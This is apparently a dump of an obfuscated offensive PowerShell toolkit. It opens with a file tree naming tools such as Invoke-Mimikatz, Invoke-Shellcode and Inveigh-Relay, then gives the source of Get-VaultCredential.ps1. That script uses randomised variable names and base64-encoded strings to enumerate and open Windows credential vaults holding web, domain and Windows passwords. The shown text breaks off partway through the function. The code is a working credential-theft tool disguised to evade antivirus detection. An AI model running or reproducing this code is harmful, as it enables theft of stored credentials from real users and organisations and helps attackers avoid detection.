├── Get-VaultCredential.ps1 ├── Inveigh-BruteForce.ps1 ├── Inveigh-Relay.ps1 ├── Inveigh.ps1 ├── Invoke-GPPPassword.ps1 ├── Invoke-Mimikatz.ps1 ├── Invoke-NinjaCopy.ps1 ├── Invoke-RelfectivePEInjection.ps1 ├── Invoke-Shellcode.ps1 ├── Invoke-WmiCommand.ps1 ├── Persistence.ps1 ├── PowerUp.ps1 ├── PowerView.ps1 ├── README.md └── VolumeShadowCopyTools.ps1 /Get-VaultCredential.ps1: -------------------------------------------------------------------------------- 1 | function Get-VaultCredential 2 | { 3 | [CmdletBinding()] Param() 4 | ${1280d28a4cc6471db5b1eef88609e343} = [Environment]::OSVersion.Version 5 | ${bd40dfe484f544f5ac49b71a65f7b35a} = ${1280d28a4cc6471db5b1eef88609e343}.Major 6 | ${9cad0d1e6b2e48439dde28800f64a4c9} = ${1280d28a4cc6471db5b1eef88609e343}.Minor 7 | ${53cbce4b052e4e39a8b63eadcbf809dd} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AFUAdABpAGwA')))) 8 | ${5e50cb66d1a348a7845c7f446475467d} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${53cbce4b052e4e39a8b63eadcbf809dd}, [Reflection.Emit.AssemblyBuilderAccess]::Run) 9 | ${c82ba4aabf1e49a4808fe79eb5673a0c} = ${5e50cb66d1a348a7845c7f446475467d}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AFUAdABpAGwA'))), $False) 10 | ${6c9cec1398574859bcfc2982421440cc} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8ARQBMAEUATQBFAE4AVABfAFQAWQBQAEUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [Int32]) 11 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGQAZQBmAGkAbgBlAGQA'))), -1) 12 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgBvAG8AbABlAGEAbgA='))), 0) 13 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAG8AcgB0AA=='))), 1) 14 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAHMAaQBnAG4AZQBkAFMAaABvAHIAdAA='))), 2) 15 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHQA'))), 3) 16 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAHMAaQBnAG4AZQBkAEkAbgB0AA=='))), 4) 17 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAHUAYgBsAGUA'))), 5) 18 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwB1AGkAZAA='))), 6) 19 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AHIAaQBuAGcA'))), 7) 20 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QgB5AHQAZQBBAHIAcgBhAHkA'))), 8) 21 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABpAG0AZQBTAHQAYQBtAHAA'))), 9) 22 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAG8AdABlAGMAdABlAGQAQQByAHIAYQB5AA=='))), 10) 23 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB0AHQAcgBpAGIAdQB0AGUA'))), 11) 24 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBpAGQA'))), 12) 25 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABhAHMAdAA='))), 13) 26 | ${62f0aacddeff4a369deda8333279ef46} = ${6c9cec1398574859bcfc2982421440cc}.CreateType() 27 | ${6c9cec1398574859bcfc2982421440cc} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineEnum($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8AUwBDAEgARQBNAEEAXwBFAEwARQBNAEUATgBUAF8ASQBEAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA'))), [Int32]) 28 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBsAGwAZQBnAGEAbAA='))), 0) 29 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAHMAbwB1AHIAYwBlAA=='))), 1) 30 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBkAGUAbgB0AGkAdAB5AA=='))), 2) 31 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAaABlAG4AdABpAGMAYQB0AG8AcgA='))), 3) 32 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VABhAGcA'))), 4) 33 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABhAGMAawBhAGcAZQBTAGkAZAA='))), 5) 34 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBwAHAAUwB0AGEAcgB0AA=='))), 100) 35 | $null = ${6c9cec1398574859bcfc2982421440cc}.DefineLiteral($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBwAHAARQBuAGQA'))), 10000) 36 | ${c25a0c27aa41423b88af4de05ab1b339} = ${6c9cec1398574859bcfc2982421440cc}.CreateType() 37 | ${007ccd859840494b96bfcd68c4597e38} = [Runtime.InteropServices.StructLayoutAttribute].GetConstructor([Runtime.InteropServices.LayoutKind]) 38 | ${3adf2af46bd2443c91bbee93b83d1e5c} = [Runtime.InteropServices.StructLayoutAttribute].GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBoAGEAcgBTAGUAdAA=')))) 39 | ${ab2cc37671a44046bead3b62dcbc031d} = New-Object Reflection.Emit.CustomAttributeBuilder(${007ccd859840494b96bfcd68c4597e38}, 40 | @([Runtime.InteropServices.LayoutKind]::Explicit), 41 | ${3adf2af46bd2443c91bbee93b83d1e5c}, 42 | @([Runtime.InteropServices.CharSet]::Ansi)) 43 | ${c058e66cd16247278bc23e37ea98c46d} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQB1AHQAbwBMAGEAeQBvAHUAdAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBxAHUAZQBuAHQAaQBhAGwATABhAHkAbwB1AHQALAAgAFMAZQBhAGwAZQBkACwAIABCAGUAZgBvAHIAZQBGAGkAZQBsAGQASQBuAGkAdAA='))) 44 | ${2d25dc08941f4c53ab659ba6c06f3f79} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8ASQBUAEUATQA='))), ${c058e66cd16247278bc23e37ea98c46d}, [Object], [System.Reflection.Emit.PackingSize]::Size4) 45 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBtAGEASQBkAA=='))), [Guid], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 46 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABzAHoAQwByAGUAZABlAG4AdABpAGEAbABGAHIAaQBlAG4AZABsAHkATgBhAG0AZQA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 47 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABSAGUAcwBvAHUAcgBjAGUARQBsAGUAbQBlAG4AdAA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 48 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABJAGQAZQBuAHQAaQB0AHkARQBsAGUAbQBlAG4AdAA='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 49 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABBAHUAdABoAGUAbgB0AGkAYwBhAHQAbwByAEUAbABlAG0AZQBuAHQA'))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 50 | if (${bd40dfe484f544f5ac49b71a65f7b35a} -ge 6 -and ${9cad0d1e6b2e48439dde28800f64a4c9} -ge 2) 51 | { 52 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABQAGEAYwBrAGEAZwBlAFMAaQBkAA=='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 53 | } 54 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABhAHMAdABNAG8AZABpAGYAaQBlAGQA'))), [UInt64], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 55 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZAB3AEYAbABhAGcAcwA='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 56 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZAB3AFAAcgBvAHAAZQByAHQAaQBlAHMAQwBvAHUAbgB0AA=='))), [UInt32], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 57 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cABQAHIAbwBwAGUAcgB0AHkARQBsAGUAbQBlAG4AdABzAA=='))), [IntPtr], $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))) 58 | ${f2d61ec8abbe45409ddbd8773eb71409} = ${2d25dc08941f4c53ab659ba6c06f3f79}.CreateType() 59 | ${2d25dc08941f4c53ab659ba6c06f3f79} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBBAFUATABUAF8ASQBUAEUATQBfAEUATABFAE0ARQBOAFQA'))), ${c058e66cd16247278bc23e37ea98c46d}) 60 | ${2d25dc08941f4c53ab659ba6c06f3f79}.SetCustomAttribute(${ab2cc37671a44046bead3b62dcbc031d}) 61 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBjAGgAZQBtAGEARQBsAGUAbQBlAG4AdABJAGQA'))), ${c25a0c27aa41423b88af4de05ab1b339}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))).SetOffset(0) 62 | $null = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefineField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAB5AHAAZQA='))), ${62f0aacddeff4a369deda8333279ef46}, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMA')))).SetOffset(8) 63 | ${f95b2aeb23794d24a9cc41fe39510798} = ${2d25dc08941f4c53ab659ba6c06f3f79}.CreateType() 64 | ${2d25dc08941f4c53ab659ba6c06f3f79} = ${c82ba4aabf1e49a4808fe79eb5673a0c}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEwAaQBiAC4AVgBhAHUAbAB0AGMAbABpAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEMAbABhAHMAcwA=')))) 65 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AE8AcABlAG4AVgBhAHUAbAB0AA=='))), 66 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 67 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 68 | [Reflection.CallingConventions]::Standard, 69 | [Int32], 70 | [Type[]] @([Guid].MakeByRefType(), 71 | [UInt32], 72 | [IntPtr].MakeByRefType()), 73 | [Runtime.InteropServices.CallingConvention]::Winapi, 74 | [Runtime.InteropServices.CharSet]::Auto) 75 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEMAbABvAHMAZQBWAGEAdQBsAHQA'))), 76 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 77 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 78 | [Reflection.CallingConventions]::Standard, 79 | [Int32], 80 | [Type[]] @([IntPtr].MakeByRefType()), 81 | [Runtime.InteropServices.CallingConvention]::Winapi, 82 | [Runtime.InteropServices.CharSet]::Auto) 83 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEYAcgBlAGUA'))), 84 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 85 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 86 | [Reflection.CallingConventions]::Standard, 87 | [Int32], 88 | [Type[]] @([IntPtr]), 89 | [Runtime.InteropServices.CallingConvention]::Winapi, 90 | [Runtime.InteropServices.CharSet]::Auto) 91 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEUAbgB1AG0AZQByAGEAdABlAFYAYQB1AGwAdABzAA=='))), 92 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 93 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 94 | [Reflection.CallingConventions]::Standard, 95 | [Int32], 96 | [Type[]] @([Int32], 97 | [Int32].MakeByRefType(), 98 | [IntPtr].MakeByRefType()), 99 | [Runtime.InteropServices.CallingConvention]::Winapi, 100 | [Runtime.InteropServices.CharSet]::Auto) 101 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEUAbgB1AG0AZQByAGEAdABlAEkAdABlAG0AcwA='))), 102 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 103 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 104 | [Reflection.CallingConventions]::Standard, 105 | [Int32], 106 | [Type[]] @([IntPtr], 107 | [Int32], 108 | [Int32].MakeByRefType(), 109 | [IntPtr].MakeByRefType()), 110 | [Runtime.InteropServices.CallingConvention]::Winapi, 111 | [Runtime.InteropServices.CharSet]::Auto) 112 | if (${bd40dfe484f544f5ac49b71a65f7b35a} -ge 6 -and ${9cad0d1e6b2e48439dde28800f64a4c9} -ge 2) 113 | { 114 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEcAZQB0AEkAdABlAG0A'))), 115 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 116 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 117 | [Reflection.CallingConventions]::Standard, 118 | [Int32], 119 | [Type[]] @([IntPtr], 120 | [Guid].MakeByRefType(), 121 | [IntPtr], 122 | [IntPtr], 123 | [IntPtr], 124 | [IntPtr], 125 | [Int32], 126 | [IntPtr].MakeByRefType()), 127 | [Runtime.InteropServices.CallingConvention]::Winapi, 128 | [Runtime.InteropServices.CharSet]::Auto) 129 | } 130 | else 131 | { 132 | ${dfbdc08c26294e219dae2251b5705987} = ${2d25dc08941f4c53ab659ba6c06f3f79}.DefinePInvokeMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBhAHUAbAB0AEcAZQB0AEkAdABlAG0A'))), 133 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dgBhAHUAbAB0AGMAbABpAC4AZABsAGwA'))), 134 | $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA=='))), 135 | [Reflection.CallingConventions]::Standard, 136 | [Int32], 137 | [Type[]] @([IntPtr], 138 | [Guid].MakeByRefType(), 139 | [IntPtr], 140 | [IntPtr], 141 | [IntPtr], 142 | [Int32], 143 | [IntPtr].MakeByRefType()), 144 | [Runtime.InteropServices.CallingConvention]::Winapi, 145 | [Runtime.InteropServices.CharSet]::Auto) 146 | } 147 | ${208b5b442263465081f8b114a5784fcf} = ${2d25dc08941f4c53ab659ba6c06f3f79}.CreateType() 148 | function local:Get-VaultElementValue 149 | { 150 | Param ( 151 | [ValidateScript({$_ -ne [IntPtr]::Zero})] 152 | [IntPtr] 153 | ${b1e5a2f6c5cb44889f16cdbad453cee8} 154 | ) 155 | ${9ff8f33cd97542e083bf922c95412118} = [Runtime.InteropServices.Marshal]::PtrToStructure(${b1e5a2f6c5cb44889f16cdbad453cee8}, [Type] ${f95b2aeb23794d24a9cc41fe39510798}) 156 | ${cc958e9142794654b131e8536c2f4fb8} = [IntPtr] (${b1e5a2f6c5cb44889f16cdbad453cee8}.ToInt64() + 16) 157 | switch (${9ff8f33cd97542e083bf922c95412118}.Type) 158 | { 159 | ${62f0aacddeff4a369deda8333279ef46}::String { 160 | ${8117cf6ab60f426a8bae1c51945fdf90} = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 161 | [Runtime.InteropServices.Marshal]::PtrToStringUni([IntPtr] ${8117cf6ab60f426a8bae1c51945fdf90}) 162 | } 163 | ${62f0aacddeff4a369deda8333279ef46}::Boolean { 164 | [Bool] [Runtime.InteropServices.Marshal]::ReadByte([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 165 | } 166 | ${62f0aacddeff4a369deda8333279ef46}::Short { 167 | [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 168 | } 169 | ${62f0aacddeff4a369deda8333279ef46}::UnsignedShort { 170 | [Runtime.InteropServices.Marshal]::ReadInt16([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 171 | } 172 | ${62f0aacddeff4a369deda8333279ef46}::Int { 173 | [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 174 | } 175 | ${62f0aacddeff4a369deda8333279ef46}::UnsignedInt { 176 | [Runtime.InteropServices.Marshal]::ReadInt32([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 177 | } 178 | ${62f0aacddeff4a369deda8333279ef46}::Double { 179 | [Runtime.InteropServices.Marshal]::PtrToStructure(${cc958e9142794654b131e8536c2f4fb8}, [Type] [Double]) 180 | } 181 | ${62f0aacddeff4a369deda8333279ef46}::Guid { 182 | [Runtime.InteropServices.Marshal]::PtrToStructure(${cc958e9142794654b131e8536c2f4fb8}, [Type] [Guid]) 183 | } 184 | ${62f0aacddeff4a369deda8333279ef46}::Sid { 185 | ${5014340fe373496b8cd8c2eda1b91d68} = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] ${cc958e9142794654b131e8536c2f4fb8}) 186 | Write-Verbose "0x$(${5014340fe373496b8cd8c2eda1b91d68}.ToString('X8'))" 187 | ${104d037834804cb7beb1454cda7a8b54} = [Security.Principal.SecurityIdentifier] ([IntPtr] ${5014340fe373496b8cd8c2eda1b91d68}) 188 | ${104d037834804cb7beb1454cda7a8b54}.Value 189 | } 190 | ${62f0aacddeff4a369deda8333279ef46}::ByteArray { $null } 191 | ${62f0aacddeff4a369deda8333279ef46}::TimeStamp { $null } 192 | ${62f0aacddeff4a369deda8333279ef46}::ProtectedArray { $null } 193 | ${62f0aacddeff4a369deda8333279ef46}::Attribute { $null } 194 | ${62f0aacddeff4a369deda8333279ef46}::Last { $null } 195 | } 196 | } 197 | ${24c8469bf285440a875de4a34cd79305} = 0 198 | ${fe1f5f73019a4a60a1693a6969e3c20d} = [IntPtr]::Zero 199 | ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultEnumerateVaults(0, [Ref] ${24c8469bf285440a875de4a34cd79305}, [Ref] ${fe1f5f73019a4a60a1693a6969e3c20d}) 200 | if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0) 201 | { 202 | throw "Unable to enumerate vaults. Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))" 203 | } 204 | ${a182138fef914c68bf31f8516530b664} = ${fe1f5f73019a4a60a1693a6969e3c20d} 205 | ${a49e774fea8b4e23905aabb599ed6413} = @{ 206 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MgBGADEAQQA2ADUAMAA0AC0AMAA2ADQAMQAtADQANABDAEYALQA4AEIAQgA1AC0AMwA2ADEAMgBEADgANgA1AEYAMgBFADUA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAFMAZQBjAHUAcgBlACAATgBvAHQAZQA='))) 207 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwBDAEMARAA1ADQAOQA5AC0AOAA3AEEAOAAtADQAQgAxADAALQBBADIAMQA1AC0ANgAwADgAOAA4ADgARABEADMAQgA1ADUA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAFcAZQBiACAAUABhAHMAcwB3AG8AcgBkACAAQwByAGUAZABlAG4AdABpAGEAbAA='))) 208 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQA1ADQARQAyADMARAAwAC0AQwA2ADQANAAtADQARQA2AEYALQA4AEMARQA2AC0ANQAwADYAOQAyADcAMgBGADkAOQA5AEYA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABQAGkAYwBrAGUAcgAgAFAAcgBvAHQAZQBjAHQAbwByAA=='))) 209 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NABCAEYANABDADQANAAyAC0AOQBCADgAQQAtADQAMQBBADAALQBCADMAOAAwAC0ARABEADQAQQA3ADAANABEAEQAQgAyADgA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBlAGIAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMA'))) 210 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NwA3AEIAQwA1ADgAMgBCAC0ARgAwAEEANgAtADQARQAxADUALQA0AEUAOAAwAC0ANgAxADcAMwA2AEIANgBGADMAQgAyADkA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA='))) 211 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQA2ADkARAA3ADgAMwA4AC0AOQAxAEIANQAtADQARgBDADkALQA4ADkARAA1AC0AMgAzADAARAA0AEQANABDAEMAMgBCAEMA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEQAbwBtAGEAaQBuACAAQwBlAHIAdABpAGYAaQBjAGEAdABlACAAQwByAGUAZABlAG4AdABpAGEAbAA='))) 212 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwBFADAARQAzADUAQgBFAC0AMQBCADcANwAtADQAMwBFADcALQBCADgANwAzAC0AQQBFAEQAOQAwADEAQgA2ADIANwA1AEIA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEQAbwBtAGEAaQBuACAAUABhAHMAcwB3AG8AcgBkACAAQwByAGUAZABlAG4AdABpAGEAbAA='))) 213 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MwBDADgAOAA2AEYARgAzAC0AMgA2ADYAOQAtADQAQQBBADIALQBBADgARgBCAC0AMwBGADYANwA1ADkAQQA3ADcANQA0ADgA')))) = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBpAG4AZABvAHcAcwAgAEUAeAB0AGUAbgBkAGUAZAAgAEMAcgBlAGQAZQBuAHQAaQBhAGwA'))) 214 | ([Guid] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAwADAAMAAwADAAMAAwAC0AMAAwADAAMAAtADAAMAAwADAALQAwADAAMAAwAC0AMAAwADAAMAAwADAAMAAwADAAMAAwADAA')))) = $null 215 | } 216 | if (${24c8469bf285440a875de4a34cd79305}) 217 | { 218 | foreach ($i in 1..${24c8469bf285440a875de4a34cd79305}) 219 | { 220 | ${fee04732c23a47ecacf759098477b7c2} = [Runtime.InteropServices.Marshal]::PtrToStructure(${a182138fef914c68bf31f8516530b664}, [Type] [Guid]) 221 | ${a182138fef914c68bf31f8516530b664} = [IntPtr] (${a182138fef914c68bf31f8516530b664}.ToInt64() + [Runtime.InteropServices.Marshal]::SizeOf([Type] [Guid])) 222 | ${34c503abdf824ff9bb9e662b1da95cf4} = [IntPtr]::Zero 223 | Write-Verbose "Opening vault - $(${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]) ($(${fee04732c23a47ecacf759098477b7c2}))" 224 | ${a75abc70368c44fcbb39ce9edca87f7c} = ${208b5b442263465081f8b114a5784fcf}::VaultOpenVault([Ref] ${fee04732c23a47ecacf759098477b7c2}, 0, [Ref] ${34c503abdf824ff9bb9e662b1da95cf4}) 225 | if (${a75abc70368c44fcbb39ce9edca87f7c} -ne 0) 226 | { 227 | Write-Error "Unable to open the following vault: $(${a49e774fea8b4e23905aabb599ed6413}[${fee04732c23a47ecacf759098477b7c2}]). Error (0x$(${a75abc70368c44fcbb39ce9edca87f7c}.ToString('X8')))" 228 | continue 229 | } 230 | ${d55006db11114242a5777a6348d5bbd5} = 0 